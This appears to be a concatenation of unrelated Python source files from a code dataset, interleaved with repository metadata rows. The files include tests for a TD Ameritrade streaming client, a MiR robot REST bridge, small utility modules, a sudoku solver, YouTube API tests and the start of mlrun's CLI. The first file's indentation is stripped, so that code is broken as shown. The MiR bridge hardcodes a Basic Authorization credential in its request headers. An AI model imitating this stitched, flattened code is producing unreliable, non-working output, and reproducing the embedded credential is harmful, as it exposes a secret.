await self.client.chart_equity_add(['INTC'])
handler.assert_called_once_with(stream_item['data'][0])
async_handler.assert_called_once_with(stream_item['data'][0])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_messages_routing_from_multiple_coroutines(
self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
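        # Three coroutines issue requests concurrently; the delayed responses below arrive
        # out of order, so this exercises routing each response back to the awaiting
        # coroutine by request id.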
handler_main = Mock()
async def main_loop(self):
self.client.add_chart_equity_handler(handler_main)
await self.client.chart_equity_subs(['GOOG,MSFT'])
await asyncio.sleep(0.3)
await self.client.handle_message()
handler_success = Mock()
async def success_test(self):
await asyncio.sleep(0.1)
await self.client.account_activity_sub()
handler_success()
handler_failure = Mock()
async def failure_test(self):
await asyncio.sleep(0.2)
try:
await self.client.account_activity_sub()
except tda.streaming.UnexpectedResponseCode:
handler_failure()
stream_item = self.streaming_entry('CHART_EQUITY', 'SUBS')
failed_response = self.success_response(3, 'ACCT_ACTIVITY', 'SUBS')
failed_response['response'][0]['content']['code'] = 21
async def delayedvalue(delay, value):
await asyncio.sleep(delay)
return value
socket.recv.side_effect = [
delayedvalue(0, json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS'))),
delayedvalue(0.3, json.dumps(failed_response)),
delayedvalue(0.3, json.dumps(self.success_response(2, 'ACCT_ACTIVITY', 'SUBS'))),
delayedvalue(0, json.dumps(stream_item))]
await asyncio.gather(
main_loop(self),
success_test(self),
failure_test(self))
handler_main.assert_called_once_with(stream_item['data'][0])
handler_success.assert_called_once()
handler_failure.assert_called_once()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_notify_heartbeat_messages_ignored(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps({'notify': [{'heartbeat': '1591499624412'}]})]
await self.client.chart_equity_subs(['GOOG,MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.handle_message()
handler.assert_not_called()
async_handler.assert_not_called()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_handle_message_unexpected_response(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(self.success_response(2, 'CHART_EQUITY', 'SUBS'))]
await self.client.chart_equity_subs(['GOOG,MSFT'])
with self.assertRaises(tda.streaming.UnexpectedResponse):
await self.client.handle_message()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_handle_message_unparsable_message(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
'{"data":[{"service":"LEVELONE_FUTURES", ' +
'"timestamp":1590248118165,"command":"SUBS",' +
'"content":[{"key":"/GOOG","delayed":false,' +
'"1":�,"2":�,"3":�,"6":"?","7":"?","12":�,"13":�,' +
'"14":�,"15":"?","16":"Symbol not found","17":"?",' +
'"18":�,"21":"unavailable","22":"Unknown","24":�,'
'"28":"D,D","33":�}]}]}']
await self.client.chart_equity_subs(['GOOG,MSFT'])
with self.assertRaises(tda.streaming.UnparsableMessage):
await self.client.handle_message()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_handle_message_multiple_handlers(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item_1 = self.streaming_entry('CHART_EQUITY', 'SUBS')
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(stream_item_1)]
await self.client.chart_equity_subs(['GOOG,MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.handle_message()
handler.assert_called_once_with(stream_item_1['data'][0])
async_handler.assert_called_once_with(stream_item_1['data'][0])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_multiple_data_per_message(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = self.streaming_entry(
'CHART_EQUITY', 'SUBS', [{'msg': 1}])
stream_item['data'].append(self.streaming_entry(
'CHART_EQUITY', 'SUBS', [{'msg': 2}])['data'][0])
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(stream_item)]
await self.client.chart_equity_subs(['GOOG,MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.handle_message()
handler.assert_has_calls(
[call(stream_item['data'][0]), call(stream_item['data'][1])])
async_handler.assert_has_calls(
[call(stream_item['data'][0]), call(stream_item['data'][1])])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_handle_message_without_login(self, ws_connect):
with self.assertRaisesRegex(ValueError, '.*Socket not open.*'):
await self.client.handle_message()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_subscribe_without_login(self, ws_connect):
with self.assertRaisesRegex(ValueError, '.*Socket not open.*'):
await self.client.chart_equity_subs(['GOOG,MSFT'])
| 39.013734 | 101 | 0.477171 |
933dc085dfb83128fdc163dcc30d8bd4a8446476 | 13,508 | py | Python | strategy/scripts/mir_bridge/mir_bridge.py | andy-Chien/timda_dual_arm | 94170d8889218ea0dc4e6031dcbbf59b7e37e70c | [
"MIT"
] | 3 | 2020-02-17T12:56:22.000Z | 2020-09-30T11:17:03.000Z | strategy/scripts/mir_bridge/mir_bridge.py | andy-Chien/timda_dual_arm | 94170d8889218ea0dc4e6031dcbbf59b7e37e70c | [
"MIT"
] | 2 | 2020-02-17T15:17:43.000Z | 2021-05-11T21:01:26.000Z | strategy/scripts/mir_bridge/mir_bridge.py | andy-Chien/timda_dual_arm | 94170d8889218ea0dc4e6031dcbbf59b7e37e70c | [
"MIT"
] | 9 | 2021-02-01T08:20:53.000Z | 2021-09-17T05:52:35.000Z | #!/usr/bin/python
import re
import json
import requests
import warnings
import math
import time
import base64
import os
from uuid import UUID
MAP_NAME = "HOME_AREA"
## TODO: Try to use function to reconstruct path for decorator's argument 'path'
class Request(object):
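    """Decorator for MIR methods: the wrapped method returns a request payload
    (None, a JSON body, or a dict with optional "PATH"/"BODY" keys), and the
    decorator issues the corresponding HTTP call against self.host + self.path
    and returns the raw requests response.
    """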
def __init__(self, method, path):
self.method = method.upper()
self.path = path
self.h = {
"Content-Type": "application/json;charset=UTF-8",
"Accept-Language": "en-US",
"Authorization": "Basic ZGlzdHJpYnV0b3I6NjJmMmYwZjFlZmYxMGQzMTUyYzk1ZjZmMDU5NjU3NmU0ODJiYjhlNDQ4MDY0MzNmNGNmOTI5NzkyODM0YjAxNA=="
}
def __call__(self, f):
def wrapper(obj, *args, **kwargs):
payload = f(obj, *args, **kwargs)
URL = "{}{}".format(obj.host, self.path)
if payload is not None:
if payload.has_key("PATH"):
URL = "{}{}".format(URL, payload.get("PATH"))
if payload.has_key("BODY"):
payload = payload.get("BODY")
try:
res = requests.request(self.method,
url=URL,
headers=self.h,
data=json.dumps(payload),
timeout=3)
except requests.RequestException as e:
print(e)
return
else:
try:
res = requests.request(self.method,
url=URL,
headers=self.h,
timeout=3)
except requests.RequestException as e:
print(e)
return
return res
return wrapper
class MIR(object):
def __init__(self, host):
if not "http" in host:
warnings.warn("WARRING: Maybe the host name is error.")
self.host = host
def check_response_status_code(self, res):
if str(res.status_code).startswith("20"):
print("[Response OK]")
else:
raise Exception("Response ERROR")
def is_valid_guid(self, guid_to_test, version=1):
try:
guid_obj = UUID(guid_to_test, version=version)
except ValueError:
return False
return str(guid_obj) == guid_to_test
@Request(method="get", path="/status")
def get_status(self):
pass
@Request(method="put", path="/status")
def set_status(self, set_state):
STATE = {"Ready": 3, "Pause": 4}
# Check whether input 'set_state' is correct
        if isinstance(set_state, str):
            s = STATE.get(set_state, 4)
        elif isinstance(set_state, int):
            s = set_state
        else:
            print("ERROR: set_state must be a state name (str) or a state id (int)")
            return
body = {
"state_id": s
}
return body
@Request(method="get", path="/system/info")
def get_system_info(self):
pass
@Request(method="get", path="/missions")
def get_missions(self):
pass
def get_mission_guid(self, mission, auto_create=True):
r = self.get_missions()
rjson = json.loads(r.text)
for l in rjson:
if l.get("name") == mission:
return l.get("guid")
warnings.warn("No this mission")
return None
@Request(method="get", path="/missions")
def get_mission_actions(self, mission):
mission_guid = self.get_mission_guid(mission)
if mission_guid is None:
print("[WARNING] No this mission. Creating mission {}".format(mission))
r = self.create_new_mission(mission)
rjson = json.loads(r.text)
mission_guid = rjson.get("guid")
return {"PATH": "/" + mission_guid + "/actions"}
@Request(method="get", path="/mission_queue")
def get_mission_queue(self):
pass
@Request(method="post", path="/mission_queue")
def post_mission_queue(self, mission):
body = {
"mission_id": mission
}
return body
def add_mission_to_queue(self, mission):
if not self.is_valid_guid(mission):
mission_id = self.get_mission_guid(mission)
r = self.post_mission_queue(mission_id)
self.check_response_status_code(r)
@property
def mission_queue_is_empty(self):
r = self.get_mission_queue()
rjson = json.loads(r.text)
for l in rjson:
if l.get("state").upper() == "PENDING" or \
l.get("state").upper() == "EXECUTING":
return False
return True
@Request(method="delete", path="/mission_queue")
def clear_mission_queue(self):
pass
@Request(method="get", path="/mission_groups")
def get_groups(self):
pass
def get_group_guid(self, group):
r = self.get_groups()
rjson = json.loads(r.text)
for l in rjson:
if l.get("name") == group:
return l.get("guid")
warnings.warn("No this group")
#print(r.text)
return None
@Request(method="get", path="/sessions")
def get_sessions(self):
pass
def get_session_guid(self, session):
r = self.get_sessions()
rjson = json.loads(r.text)
for l in rjson:
if l.get("name") == session:
return l.get("guid")
warnings.warn("No this session")
#print(r.text)
return None
@Request(method="post", path="/missions")
def create_new_mission(self, name, group_id="TKU_IARC", session_id="TKU_IARC"):
print("Creating new mission name: {}, group_id: {}, session_id: {}" \
.format(name, group_id, session_id))
if not self.is_valid_guid(group_id):
group_id = self.get_group_guid(group_id)
if not self.is_valid_guid(session_id):
session_id = self.get_session_guid(session_id)
body = {
"group_id": group_id,
"session_id": session_id,
"name": name
}
return body
@Request(method="delete", path="/missions")
def delete_mission(self, mission):
if not self.is_valid_guid(mission):
mission_id = self.get_mission_guid(mission)
if mission_id is None:
warnings.warn("No this mission to DELETE")
return
return {"PATH": "/" + mission_id}
@Request(method="post", path="/missions")
def add_action_to_mission(self, mission, action_type, parameters, priority, scope_reference=None):
mission_guid = self.get_mission_guid(mission)
if mission_guid is None:
print("[WARNING] No this mission. Creating mission {}".format(mission))
r = self.create_new_mission(mission)
rjson = json.loads(r.text)
mission_guid = rjson.get("guid")
path = "/" + mission_guid + "/actions"
body = {
"action_type": action_type,
"mission_id": mission_guid,
"parameters": parameters,
"priority": priority,
"scope_reference": scope_reference
}
return {"PATH": path, "BODY": body}
def add_try_catch_action(self, priority):
param = [
{ "id": "try", "value": ""},
{ "id": "catch", "value": ""}
]
self.add_action_to_mission("TKU_TMP", "try_catch", param, priority)
def get_scope_reference_guid(self, mission, id):
r = self.get_mission_actions(mission)
rjson = json.loads(r.text)
for l in rjson:
for i in l.get("parameters"):
if i.get("id") == id:
return i.get("guid")
warnings.warn("No scope_reference")
return None
def add_relative_move_action(self, dx=0.0, dy=0.0, dyaw=0.0, \
max_speed_v=0.5, max_speed_w=0.5, \
collision_detection=True, priority=1, \
use_try_catch=True):
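        # When use_try_catch is set, the move is wrapped in a try/catch mission step:
        # on failure the catch branch plays a warning sound and retries the same
        # relative move.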
scope_reference = None
param = [
{ "id": "x", "value": dx},
{ "id": "y", "value": dy},
{ "id": "orientation", "value": dyaw},
{ "id": "max_linear_speed", "value": max_speed_v},
{ "id": "max_angular_speed", "value": max_speed_w},
{ "id": "collision_detection", "value": collision_detection}
]
if use_try_catch:
self.add_try_catch_action(1)
sound_param = [
{ "id": "sound", "value": "mirconst-guid-0000-0001-sounds000000"},
{ "id": "volume", "value": 80.0},
{ "id": "mode", "value": "custom"},
{ "id": "duration", "value": "00:00:03.000000"}
]
scope_ref_try = self.get_scope_reference_guid("TKU_TMP", "try")
scope_ref_catch = self.get_scope_reference_guid("TKU_TMP", "catch")
self.add_action_to_mission("TKU_TMP", "sound", sound_param, 3, scope_ref_catch)
self.add_action_to_mission("TKU_TMP", "relative_move", param, priority, scope_ref_catch)
self.add_action_to_mission("TKU_TMP", "relative_move", param, priority, scope_ref_try)
else:
self.add_action_to_mission("TKU_TMP", "relative_move", param, priority)
def relative_move(self, dx=0.0, dy=0.0, dyaw=0.0, \
max_speed_v=0.5, max_speed_w=0.5, collision_detection=True):
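        # Rebuild the temporary TKU_TMP mission with a single relative move and queue it.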
self.clear_mission_queue()
self.delete_mission("TKU_TMP")
self.add_relative_move_action(dx, dy, dyaw, max_speed_v, max_speed_w, collision_detection, 1)
self.add_mission_to_queue("TKU_TMP")
@Request(method="get", path="/positions")
def get_positions(self):
pass
@Request(method="get", path="/positions")
def get_position_by_id(self, guid):
return {"PATH": "/" + guid}
def get_position_guid(self, position_name):
r = self.get_positions()
self.check_response_status_code(r)
rjson = json.loads(r.text)
for l in rjson:
if l.get("name") == position_name:
return l.get("guid")
print("No this position")
return None
@Request(method="post", path="/positions")
def add_position(self, name, x, y, yaw, position_type=0):
map_guid = self.get_map_guid(MAP_NAME)
body = {
"map_id": map_guid,
"name": name,
"orientation": yaw,
"pos_x": x,
"pos_y": y,
"type_id": position_type
}
return body
@property
def status(self):
r = self.get_status()
self.check_response_status_code(r)
rjson = json.loads(r.text)
d = {
"mir_state": rjson.get("state_text").encode('utf-8'),
"mir_position": {
"x": rjson.get("position").get("x"),
"y": rjson.get("position").get("y"),
"yaw": rjson.get("position").get("orientation")
}
}
return d
## Maybe this function is useless
def arrived_position(self, position_name):
id = self.get_position_guid(position_name)
r = self.get_position_by_id(id)
self.check_response_status_code(r)
rjson = json.loads(r.text)
if rjson.get("name") == position_name:
rs = self.get_status()
rsjson = json.loads(rs.text)
dx = rjson.get("pos_x") - rsjson.get("position").get("x")
dy = rjson.get("pos_y") - rsjson.get("position").get("y")
dyaw = rjson.get("orientation") - rsjson.get("position").get("orientation")
if math.hypot(dx, dy) < 0.1 and abs(dyaw) < 10:
print("Distanse is short enough. {}, {}, {}".format(dx, dy, dyaw))
return True
else:
return False
@Request(method="get", path="/maps")
def get_maps(self):
pass
@Request(method="get", path="/maps")
def get_map(self, map_name):
if not self.is_valid_guid(map_name):
map_guid = self.get_map_guid(map_name)
if map_guid is None:
warnings.warn("No this map: {}".format(map_name))
return
return {"PATH": "/" + map_guid}
def get_map_guid(self, map_name):
r = self.get_maps()
rjson = json.loads(r.text)
for l in rjson:
if l.get("name") == map_name:
return l.get("guid")
print("No this position")
return None
def save_map(self, map_name=MAP_NAME, saved_name=None, \
saved_path=os.path.dirname(os.path.abspath(__file__))+"/maps/"):
if saved_name is None:
t = time.localtime()
timestamp = time.strftime('%b-%d-%Y_%H%M', t)
saved_name = (map_name + "-" + timestamp + ".png")
r = self.get_map(map_name)
rjson = json.loads(r.text)
bMap = rjson.get("map")
print(bMap)
if not os.path.exists(saved_path):
os.mkdir(saved_path)
print("Directory " , saved_path, " Created ")
with open(saved_path + saved_name, "wb") as fh:
fh.write(base64.b64decode(bMap))
print("[INFO] Saved {} map in {}".format(map_name, saved_path))
| 34.284264 | 141 | 0.543826 |
00442a83cd9868d14beb379932132749df0977b3 | 980 | py | Python | pypipe/lib/controls/file.py | AGrigis/pypipe | a77fc2c81cb469535b650c79718f811c5c056238 | [
"CECILL-B"
] | null | null | null | pypipe/lib/controls/file.py | AGrigis/pypipe | a77fc2c81cb469535b650c79718f811c5c056238 | [
"CECILL-B"
] | null | null | null | pypipe/lib/controls/file.py | AGrigis/pypipe | a77fc2c81cb469535b650c79718f811c5c056238 | [
"CECILL-B"
] | null | null | null | ##########################################################################
# PyPipe - Copyright (C) AGrigis, 2017
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
# System import
import os
# Package import
from .base import Base
class File(Base):
""" Define a file parameter.
"""
def _is_valid(self, value):
""" A method used to check if the value is a file name.
Parameters
----------
value: str (mandatory)
a file name.
Returns
-------
is_valid: bool
return True if the value is a file,
False otherwise.
"""
if isinstance(value, str) and os.path.isfile(value):
return True
else:
return False
| 26.486486 | 74 | 0.496939 |
5caa73d1f26cf37ca475c4d850c4bbad9194da5c | 1,062 | py | Python | opteryx/storage/adapters/local/disk_store.py | mabel-dev/waddles | 959653ac7a66f1035e90085fc036fe7b0a1e57db | [
"Apache-2.0"
] | null | null | null | opteryx/storage/adapters/local/disk_store.py | mabel-dev/waddles | 959653ac7a66f1035e90085fc036fe7b0a1e57db | [
"Apache-2.0"
] | null | null | null | opteryx/storage/adapters/local/disk_store.py | mabel-dev/waddles | 959653ac7a66f1035e90085fc036fe7b0a1e57db | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from opteryx.storage import BaseStorageAdapter
class DiskStorage(BaseStorageAdapter):
def __init__(self):
pass
def read_blob(self, blob_name):
import io
with open(blob_name, "rb") as blob:
# wrap in a BytesIO so we can close the file
return io.BytesIO(blob.read())
def get_blob_list(self, partition):
import glob
files = glob.glob(str(partition / "**"), recursive=True)
return [f for f in files if os.path.isfile(f)]
| 32.181818 | 74 | 0.699623 |
356718cf26860a04d368a8e52a4dd33966b7d392 | 965 | py | Python | Products/CMFDefault/browser/membership/tests/test_authentication.py | zopefoundation/Products.CMFDefault | a176d9aac5a7e04725dbd0f7b76c6ac357062139 | [
"ZPL-2.1"
] | null | null | null | Products/CMFDefault/browser/membership/tests/test_authentication.py | zopefoundation/Products.CMFDefault | a176d9aac5a7e04725dbd0f7b76c6ac357062139 | [
"ZPL-2.1"
] | 5 | 2017-07-13T00:51:25.000Z | 2021-02-04T15:08:39.000Z | Products/CMFDefault/browser/membership/tests/test_authentication.py | zopefoundation/Products.CMFDefault | a176d9aac5a7e04725dbd0f7b76c6ac357062139 | [
"ZPL-2.1"
] | 3 | 2017-07-08T03:22:35.000Z | 2018-05-20T06:42:03.000Z | ##############################################################################
#
# Copyright (c) 2010 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
""" Test Products.CMFDefault.browser.authentication
"""
import unittest
from Testing import ZopeTestCase
from Products.CMFDefault.testing import FunctionalLayer
ftest_suite = ZopeTestCase.FunctionalDocFileSuite('authentication.txt')
ftest_suite.layer = FunctionalLayer
def test_suite():
return unittest.TestSuite((
ftest_suite,
))
| 33.275862 | 78 | 0.648705 |
5d258d5bf9ec4eaf286e61afb3b5ca967b6d188c | 1,388 | py | Python | py/solns/sudokuSolver/sudokuSolver.py | zcemycl/algoTest | 9518fb2b60fd83c85aeb2ab809ff647aaf643f0a | [
"MIT"
] | 1 | 2022-01-26T16:33:45.000Z | 2022-01-26T16:33:45.000Z | py/solns/sudokuSolver/sudokuSolver.py | zcemycl/algoTest | 9518fb2b60fd83c85aeb2ab809ff647aaf643f0a | [
"MIT"
] | null | null | null | py/solns/sudokuSolver/sudokuSolver.py | zcemycl/algoTest | 9518fb2b60fd83c85aeb2ab809ff647aaf643f0a | [
"MIT"
] | 1 | 2022-01-26T16:35:44.000Z | 2022-01-26T16:35:44.000Z | from collections import defaultdict
class Solution:
@staticmethod
def naive(board):
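        # Backtracking: track the digits already used in each row, column and 3x3
        # square, fill empty cells left-to-right, top-to-bottom, and undo a placement
        # whenever no digit fits further down the board.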
n = len(board)
rows = defaultdict(set)
cols = defaultdict(set)
sqs = defaultdict(set)
for r in range(n):
for c in range(n):
if board[r][c]!=".":
tmp = board[r][c]
rows[r].add(tmp)
cols[c].add(tmp)
sqs[r//3*3+c//3].add(tmp)
def valid(r,c,v):
return v not in rows[r] and v not in cols[c] and \
v not in sqs[r//3*3+c//3]
def recursive(r,c):
if r==n-1 and c==n:
return True
elif c==n:
c=0
r+=1
if board[r][c]!=".":
return recursive(r,c+1)
sqid = r//3*3+c//3
for v in range(1,10):
tmp = str(v)
if not valid(r,c,tmp):
continue
board[r][c] = tmp
rows[r].add(tmp)
cols[c].add(tmp)
sqs[sqid].add(tmp)
if recursive(r,c+1):
return True
board[r][c] = "."
rows[r].remove(tmp)
cols[c].remove(tmp)
sqs[sqid].remove(tmp)
return False
recursive(0,0) | 29.531915 | 62 | 0.386167 |
7ac7d89b06a3a3e1084aeb5b443022d63ebff43e | 4,093 | py | Python | foxylib/tools/googleapi/youtube/data/tests/test_dataapi_tool.py | foxytrixy-com/foxylib | 94b8c5b9f8b12423393c68f7d9f910258840ed18 | [
"BSD-3-Clause"
] | null | null | null | foxylib/tools/googleapi/youtube/data/tests/test_dataapi_tool.py | foxytrixy-com/foxylib | 94b8c5b9f8b12423393c68f7d9f910258840ed18 | [
"BSD-3-Clause"
] | null | null | null | foxylib/tools/googleapi/youtube/data/tests/test_dataapi_tool.py | foxytrixy-com/foxylib | 94b8c5b9f8b12423393c68f7d9f910258840ed18 | [
"BSD-3-Clause"
] | null | null | null | import logging
import os
from functools import reduce
from pprint import pprint
from unittest import TestCase
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient.discovery import build
import pytest
from googleapiclient.http import MediaFileUpload
from foxylib.tools.collections.iter_tool import IterTool
from foxylib.tools.googleapi.foxylib_googleapi import FoxylibGoogleapi
from foxylib.tools.googleapi.youtube.data.dataapi_tool import DataapiTool, LiveStreamingData
from foxylib.tools.googleapi.youtube.youtubeapi_tool import YoutubeapiTool
from foxylib.tools.log.foxylib_logger import FoxylibLogger
FILE_PATH = os.path.realpath(__file__)
REPO_DIR = reduce(lambda x, f: f(x), [os.path.dirname] * 7, FILE_PATH)
class TestNative(TestCase):
@pytest.mark.skip(reason="upload slow. too much quota (1600)")
def test_1_upload(self):
# https://www.youtube.com/watch?v=CxRIcOLLWZk
logger = FoxylibLogger.func_level2logger(self.test_1_upload, logging.DEBUG)
# video_id = 'ePnWBJnj7C0'
credentials = FoxylibGoogleapi.ServiceAccount.credentials(
scopes=["https://www.googleapis.com/auth/youtube.upload"],
)
# str_SCOPE = "drive.readonly"
# creds = GSSTool.username_scope2creds(FoxylibGoogleapi.OAuth.username(), str_SCOPE)
# service = build('drive', 'v3', http=creds.authorize(Http()), cache_discovery=False)
youtube_service = YoutubeapiTool.credentials2service(credentials)
request = youtube_service.videos().insert(
part="snippet,status",
body={
"snippet": {
"categoryId": "22",
"description": "Description of uploaded video.",
"title": "Test video upload.",
# 'liveBroadcastContent':'upcoming',
},
"status": {
"privacyStatus": "private",
}
},
# TODO: For this request to work, you must replace "YOUR_FILE"
# with a pointer to the actual file you are uploading.
media_body=MediaFileUpload("/Users/moonyoungkang/Downloads/lightning.mp4")
)
response = request.execute()
print(response)
class TestDataapiTool(TestCase):
@classmethod
def setUpClass(cls):
FoxylibLogger.attach_stderr2loggers(logging.DEBUG)
@pytest.mark.skip(reason='"activeLiveChatId" seems to have TTL. disappeared after not using for long time')
def test_01(self):
# https://www.youtube.com/watch?v=nHRKoNOQ56w
logger = FoxylibLogger.func_level2logger(self.test_01, logging.DEBUG)
video_id = 'SXfFccUDK68'
credentials = FoxylibGoogleapi.ServiceAccount.credentials()
youtube_service = YoutubeapiTool.credentials2service(credentials)
data = DataapiTool.video_id2live_streaming_data(video_id, youtube_service)
logger.debug({'data':data})
chat_id = LiveStreamingData.data2chat_id(data)
# ref = 'Cg0KC25IUktvTk9RNTZ3KicKGFVDbXJscUZJS19RUUNzcjNGUkhhM09LdxILbkhSS29OT1E1Nnc'
ref = 'Cg0KC1NYZkZjY1VESzY4KicKGFVDYVlIYkVkcHJ1VFd5QkwxV0xHSHRidxILU1hmRmNjVURLNjg'
self.assertEqual(chat_id, ref)
# ptah-dev
# livestream data
@pytest.mark.skip(reason="'video_id' keep changing")
def test_02(self):
# https://www.youtube.com/watch?v=CxRIcOLLWZk
logger = FoxylibLogger.func_level2logger(self.test_02, logging.DEBUG)
video_id = 'ePnWBJnj7C0'
credentials = FoxylibGoogleapi.ServiceAccount.credentials()
youtube_service = YoutubeapiTool.credentials2service(credentials)
data = DataapiTool.video_id2live_streaming_data(video_id, youtube_service)
chat_id = LiveStreamingData.data2chat_id(data)
# logger.debug({'chat_id':chat_id})
# ref = 'Cg0KC0N4UkljT0xMV1prKicKGFVDTDI5X1pkaENHV3pjMTZ1NW04S19VURILQ3hSSWNPTExXWms'
ref = 'Cg0KC2VQbldCSm5qN0MwKicKGFVDTDI5X1pkaENHV3pjMTZ1NW04S19VURILZVBuV0JKbmo3QzA'
self.assertEqual(chat_id, ref)
| 40.524752 | 111 | 0.699243 |
4e85671c20826847b14ed12f241c3f4fc8fd2c61 | 32,312 | py | Python | mlrun/__main__.py | adiso75/mlrun | 0da2e72a1e2aa189074bd2ec059f2bc452f349cf | [
"Apache-2.0"
] | null | null | null | mlrun/__main__.py | adiso75/mlrun | 0da2e72a1e2aa189074bd2ec059f2bc452f349cf | [
"Apache-2.0"
] | null | null | null | mlrun/__main__.py | adiso75/mlrun | 0da2e72a1e2aa189074bd2ec059f2bc452f349cf | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2018 Iguazio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import traceback
from ast import literal_eval
from base64 import b64decode, b64encode
from os import environ, path
from pprint import pprint
from subprocess import Popen
from sys import executable
import click
import yaml
from tabulate import tabulate
import mlrun
from .builder import upload_tarball
from .config import config as mlconf
from .db import get_run_db
from .k8s_utils import K8sHelper
from .model import RunTemplate
from .platforms import auto_mount as auto_mount_modifier
from .projects import load_project
from .run import get_object, import_function, import_function_to_dict, new_function
from .runtimes import RemoteRuntime, RunError, RuntimeKinds, ServingRuntime
from .secrets import SecretsStore
from .utils import (
RunNotifications,
dict_to_yaml,
get_in,
list2dict,
logger,
parse_versioned_object_uri,
run_keys,
update_in,
)
from .utils.version import Version
@click.group()
def main():
pass
@main.command(context_settings=dict(ignore_unknown_options=True))
@click.argument("url", type=str, required=False)
@click.option(
"--param",
"-p",
default="",
multiple=True,
help="parameter name and value tuples, e.g. -p x=37 -p y='text'",
)
@click.option("--inputs", "-i", multiple=True, help="input artifact")
@click.option("--outputs", "-o", multiple=True, help="output artifact/result for kfp")
@click.option("--in-path", help="default input path/url (prefix) for artifact")
@click.option("--out-path", help="default output path/url (prefix) for artifact")
@click.option(
"--secrets", "-s", multiple=True, help="secrets file=<filename> or env=ENV_KEY1,.."
)
@click.option("--uid", help="unique run ID")
@click.option("--name", help="run name")
@click.option("--workflow", help="workflow name/id")
@click.option("--project", help="project name/id")
@click.option("--db", default="", help="save run results to path or DB url")
@click.option(
"--runtime", "-r", default="", help="function spec dict, for pipeline usage"
)
@click.option(
"--kfp", is_flag=True, help="running inside Kubeflow Piplines, do not use"
)
@click.option(
"--hyperparam",
"-x",
default="",
multiple=True,
help="hyper parameters (will expand to multiple tasks) e.g. --hyperparam p2=[1,2,3]",
)
@click.option(
"--param-file", default="", help="path to csv table of execution (hyper) params"
)
@click.option(
"--selector",
default="",
help="how to select the best result from a list, e.g. max.accuracy",
)
@click.option(
"--hyper-param-strategy",
default="",
help="hyperparam tuning strategy list | grid | random",
)
@click.option(
"--hyper-param-options", default="", help="hyperparam options json string",
)
@click.option(
"--func-url",
"-f",
default="",
help="path/url of function yaml or function " "yaml or db://<project>/<name>[:tag]",
)
@click.option("--task", default="", help="path/url to task yaml")
@click.option(
"--handler", default="", help="invoke function handler inside the code file"
)
@click.option("--mode", help="special run mode noctx | pass")
@click.option("--schedule", help="cron schedule")
@click.option("--from-env", is_flag=True, help="read the spec from the env var")
@click.option("--dump", is_flag=True, help="dump run results as YAML")
@click.option("--image", default="", help="container image")
@click.option("--kind", default="", help="serverless runtime kind")
@click.option("--source", default="", help="source code archive/git")
@click.option("--local", is_flag=True, help="run the task locally (ignore runtime)")
@click.option(
"--auto-mount", is_flag=True, help="add volume mount to job using auto mount option"
)
@click.option("--workdir", default="", help="run working directory")
@click.option("--label", multiple=True, help="run labels (key=val)")
@click.option("--watch", "-w", is_flag=True, help="watch/tail run log")
